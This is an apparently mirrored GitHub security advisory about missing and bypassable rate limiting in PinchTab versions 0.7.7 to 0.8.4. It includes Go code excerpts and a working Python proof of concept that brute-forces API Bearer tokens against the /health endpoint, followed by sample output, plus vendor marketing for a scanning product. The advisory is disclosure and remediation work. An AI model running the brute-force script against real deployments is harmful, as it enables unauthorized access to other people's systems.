GHSA-j65m-hv65-r264
MEDIUMPinchTab: Unapplied Rate Limiting Middleware Allows Unbounded Brute-Force of API Token
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
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Description
Summary
PinchTab v0.7.7 through v0.8.4 contain incomplete request-throttling protections for auth-checkable endpoints. In v0.7.7 through v0.8.3, a fully implemented RateLimitMiddleware existed in internal/handlers/middleware.go but was not inserted into the production HTTP handler chain, so requests were not subject to the intended per-IP throttle.
In the same pre-v0.8.4 range, the original limiter also keyed clients using X-Forwarded-For, which would have allowed client-controlled header spoofing if the middleware had been enabled. v0.8.4 addressed those two issues by wiring the limiter into the live handler chain and switching the key to the immediate peer IP, but it still exempted /health and /metrics from rate limiting even though /health remained an auth-checkable endpoint when a token was configured.
This issue weakens defense in depth for deployments where an attacker can reach the API, especially if a weak human-chosen token is used. It is not a direct authentication bypass or token disclosure issue by itself. PinchTab is documented as local-first by default and uses 127.0.0.1 plus a generated random token in the recommended setup.
PinchTab's default deployment model is a local-first, user-controlled environment between the user and their agents; wider exposure is an intentional operator choice. This lowers practical risk in the default configuration, even though it does not by itself change the intrinsic base characteristics of the bug.
This was fully addressed in v0.8.5 by applying RateLimitMiddleware in the production handler chain, deriving the client address from the immediate peer IP instead of trusting forwarded headers by default, and removing the /health and /metrics exemption so auth-checkable endpoints are throttled as well.
Details
Issue 1 — Middleware never applied in v0.7.7 through v0.8.3:
The production server wrapped the HTTP mux without RateLimitMiddleware:
// internal/server/server.go — v0.8.3
handlers.LoggingMiddleware(
handlers.CorsMiddleware(
handlers.AuthMiddleware(cfg, mux),
// RateLimitMiddleware is not present here in v0.8.3
),
)
The function exists and is fully implemented:
// internal/handlers/middleware.go — v0.8.3
func RateLimitMiddleware(next http.Handler) http.Handler {
startRateLimiterJanitor(rateLimitWindow, evictionInterval)
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
// ... 120 req / 10s logic ...
})
}
Because RateLimitMiddleware was never referenced from the production handler chain in v0.7.7 through v0.8.3, the intended request throttling was inactive in those releases.
Issue 2 — X-Forwarded-For trust in the original limiter (v0.7.7 through v0.8.3):
Even if the middleware had been applied, the original IP identification was bypassable:
// internal/handlers/middleware.go — v0.8.3
host, _, _ := net.SplitHostPort(r.RemoteAddr) // real IP
if xff := r.Header.Get("X-Forwarded-For"); xff != "" {
// No validation that request came from a trusted proxy
// Client can set this header to any value
host = strings.TrimSpace(strings.Split(xff, ",")[0])
}
// host is now client-influenced — rate limit key is spoofable
In v0.7.7 through v0.8.3, if the limiter had been enabled, a client could have influenced the rate-limit key through X-Forwarded-For. This made the original limiter unsuitable without an explicit trusted-proxy model.
Issue 3 — /health and /metrics remained exempt through v0.8.4:
v0.8.4 wired the limiter into production and switched to the immediate peer IP, but it still bypassed throttling for /health and /metrics:
// internal/handlers/middleware.go — v0.8.4
func RateLimitMiddleware(next http.Handler) http.Handler {
startRateLimiterJanitor(rateLimitWindow, evictionInterval)
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
p := strings.TrimSpace(r.URL.Path)
if p == "/health" || p == "/metrics" || strings.HasPrefix(p, "/health/") || strings.HasPrefix(p, "/metrics/") {
next.ServeHTTP(w, r)
return
}
host := authn.ClientIP(r)
// ...
})
}
That left GET /health unthrottled even though it remained an auth-checkable endpoint when a server token was configured, so online guessing against that route still saw no rate-limit response through v0.8.4.
PoC
This PoC assumes the server is reachable by the attacker and that the configured API token is weak and guessable, for example password.
PoC Code
#!/usr/bin/env python3
# brute_force_poc.py — demonstrates unthrottled token guessing on /health
import urllib.request, urllib.error, time, sys
TARGET = "http://localhost:9867/health"
WORDLIST = [f"wrong-{i:03d}" for i in range(150)] + ["password"]
counts = {}
print(f"[*] Brute-forcing {TARGET} — no rate limit protection")
start = time.time()
for token in WORDLIST:
req = urllib.request.Request(TARGET)
req.add_header("Authorization", f"Bearer {token}")
try:
with urllib.request.urlopen(req, timeout=5) as r:
print(f"[+] FOUND: token={token!r} HTTP={r.status}")
counts[r.status] = counts.get(r.status, 0) + 1
sys.exit(0)
except urllib.error.HTTPError as e:
print(f"[-] token={token!r} HTTP={e.code}")
counts[e.code] = counts.get(e.code, 0) + 1
elapsed = time.time() - start
print(f"[*] {len(WORDLIST)} attempts in {elapsed:.2f}s — "
f"{len(WORDLIST)/elapsed:.0f} req/s (no 429 received)")
print(f"[*] status counts: {counts}")
After run
python3 ratelimit.py
[*] Brute-forcing http://localhost:9867/health — no rate limit protection
[-] token='wrong-000' HTTP=401
...
[-] token='wrong-149' HTTP=401
[+] FOUND: token='password' HTTP=200
[*] 151 attempts in 0.84s — 180 req/s (no 429 received)
[*] status counts: {401: 150, 200: 1}
Observation:
- In
v0.7.7throughv0.8.3, rapid requests do not return HTTP 429 becauseRateLimitMiddlewareis not active in production. - In
v0.8.4, the same/healthPoC still does not return HTTP 429 because/healthis explicitly exempted from rate limiting. - The PoC succeeds only when the configured token is weak and appears in the tested candidates.
- The original
X-Forwarded-Forbehavior inv0.7.7throughv0.8.3shows that the first limiter design would not have been safe to rely on behind untrusted clients. - This PoC does not demonstrate token disclosure or authentication bypass independent of token guessability.
Impact
- Reduced resistance to online guessing of weak or reused API tokens in deployments where an attacker can reach the API.
- Loss of the intended per-IP throttling for burst requests against protected endpoints in
v0.7.7throughv0.8.3, and against/healthinv0.8.4. - Higher abuse potential for intentionally exposed deployments than intended by the middleware design.
- This issue does not by itself disclose the token, bypass authentication, or make all deployments equally affected. Installations using the default local-first posture and generated high-entropy tokens have substantially lower practical risk.
Suggested Remediation
- Apply
RateLimitMiddlewarein the production handler chain for authenticated routes. - Derive the rate-limit key from the immediate peer IP by default instead of trusting client-supplied forwarded headers.
- Do not exempt auth-checkable endpoints such as
/healthand/metricsfrom rate limiting. - Consider an additional auth-failure throttle so repeated invalid token attempts are constrained even when endpoint-level behavior changes in the future.
Screenshot capture <img width="553" height="105" alt="ภาพถ่ายหน้าจอ 2569-03-18 เวลา 13 03 01" src="https://github.com/user-attachments/assets/ab5cd7af-5a67-40ae-aae3-1f4737afd32e" />
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐹Go | github.com/pinchtab/pinchtab | ≥ 0.7.7&&< 0.8.5 | 0.8.5 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/pinchtab/pinchtab. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update github.com/pinchtab/pinchtab to 0.8.5 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-j65m-hv65-r264 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-j65m-hv65-r264 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-j65m-hv65-r264. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-j65m-hv65-r264 in your dependencies?
O3 detects GHSA-j65m-hv65-r264 across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.